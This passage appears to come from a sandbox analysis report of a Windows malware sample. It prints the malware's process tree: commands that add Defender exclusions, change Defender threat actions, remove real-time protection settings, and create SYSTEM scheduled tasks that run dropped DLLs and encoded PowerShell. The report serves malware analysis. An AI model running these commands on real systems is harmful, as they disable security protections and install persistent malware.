                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1756
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2440
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1780
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:2472
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2040
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1532
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSZVwhDuipfU2" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:816
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1480
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkrzaJYfU" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2156
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2824
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2812
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ksrpDeExrbNyC" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:2848
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VPXvovUKlRyvohVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2752
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VPXvovUKlRyvohVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2756
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2652
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2940
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2336
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2868
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:1256
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GTQqDGwYWbPvVFKR" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2760
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "gaeZrcTKg" /SC once /ST 04:25:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2228
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "gaeZrcTKg"
                                                                  3⤵
                                                                    PID:860
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /DELETE /F /TN "gaeZrcTKg"
                                                                    3⤵
                                                                      PID:1576
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                      3⤵
                                                                        PID:2028
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                          4⤵
                                                                            PID:2100
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                          3⤵
                                                                            PID:1656
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                              4⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:664
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "sVfKXSxRUTGMojFRQ" /SC once /ST 01:30:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\GYXoSBr.exe\" SY /rRHMdidhA 525403 /S" /V1 /F
                                                                            3⤵
                                                                            • Drops file in Windows directory
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2804
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /run /I /tn "sVfKXSxRUTGMojFRQ"
                                                                            3⤵
                                                                              PID:2524
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 656
                                                                              3⤵
                                                                              • Loads dropped DLL
                                                                              • Program crash
                                                                              PID:3012
                                                                          • C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\GYXoSBr.exe
                                                                            C:\Windows\Temp\GTQqDGwYWbPvVFKR\ZvutFELjBhnCNxa\GYXoSBr.exe SY /rRHMdidhA 525403 /S
                                                                            2⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops Chrome extension
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:772
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1556
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                4⤵
                                                                                • Indirect Command Execution
                                                                                PID:1040
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                    PID:620
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      6⤵
                                                                                        PID:264
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:848
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1836
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:1488
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1764
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:2116
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                            6⤵
                                                                                              PID:1596
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1852
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:2496
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                6⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2584
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:236
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              5⤵
                                                                                                PID:1636
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:568
                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    7⤵
                                                                                                      PID:1680
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "bVxDcMagaMCWGEtnSM"
                                                                                              3⤵
                                                                                                PID:1860
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2440
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1736
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:708
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1916
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1928
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2744
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    5⤵
                                                                                                      PID:2824
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2812
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          7⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2640
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\fkrzaJYfU\yHtzBj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkdMMdcQOSgrkCH" /V1 /F
                                                                                                  3⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1704
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "rkdMMdcQOSgrkCH2" /F /xml "C:\Program Files (x86)\fkrzaJYfU\sSepYaS.xml" /RU "SYSTEM"
                                                                                                  3⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2584
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /END /TN "rkdMMdcQOSgrkCH"
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2348
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "rkdMMdcQOSgrkCH"
                                                                                                  3⤵
                                                                                                    PID:2284
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "qEuMReANSKeOhW" /F /xml "C:\Program Files (x86)\eSZVwhDuipfU2\VJyxOzT.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:236
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "rDcBhYxsizQNm2" /F /xml "C:\ProgramData\VPXvovUKlRyvohVB\LyYlnvn.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1696
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "vySwpAphEGJzcJQeJ2" /F /xml "C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\YgbCBEg.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1652
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "isPWwNKyFiUyNQihUoJ2" /F /xml "C:\Program Files (x86)\ksrpDeExrbNyC\VgRzUSY.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1820
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "orYTGZZdvmLRzxgHX" /SC once /ST 04:55:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\YekSuLKj\iESRuZL.dll\",#1 /gdidazms 525403" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:3052
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /run /I /tn "orYTGZZdvmLRzxgHX"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2368
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "sVfKXSxRUTGMojFRQ"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2636
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 1556
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    PID:2696
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\YekSuLKj\iESRuZL.dll",#1 /gdidazms 525403
                                                                                                  2⤵
                                                                                                    PID:1724
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GTQqDGwYWbPvVFKR\YekSuLKj\iESRuZL.dll",#1 /gdidazms 525403
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2020
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "orYTGZZdvmLRzxgHX"
                                                                                                        4⤵
                                                                                                          PID:2876
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {657FF2D7-1ED9-4E45-B6B2-A47C5824FE7E} S-1-5-21-1385883288-3042840365-2734249351-1000:RPXOCQRF\Admin:Interactive:[1]
                                                                                                    1⤵
                                                                                                      PID:2264
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3032
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3024
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2220
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:2952
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2948
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:2056
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:1840
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:2248
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:1572

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Program Files (x86)\eSZVwhDuipfU2\VJyxOzT.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  63b1cc2670b2841bc36576b1e7786e6d

                                                                                                                  SHA1

                                                                                                                  e54dcda5eb8a5d6137a095a4ebadacd39c70b8a2

                                                                                                                  SHA256

                                                                                                                  c9167fb449f6025d8140a2665cf12a06297dd98814829acc2e5505b4cd6f27f3

                                                                                                                  SHA512

                                                                                                                  86f9191323e84b1ac9f9ec552bf71576d1cbd4cffb88a694f91e6e73878fd03a5ac1a0149ca475d30a37d1fc7687b9d959a770d248c0c0fde526d4d885a3e05c

                                                                                                                • C:\Program Files (x86)\fkrzaJYfU\sSepYaS.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  355209b716a756b6d74730672f7ff06e

                                                                                                                  SHA1

                                                                                                                  773f38b35710ddc53d834cdddd43a193925c8829

                                                                                                                  SHA256

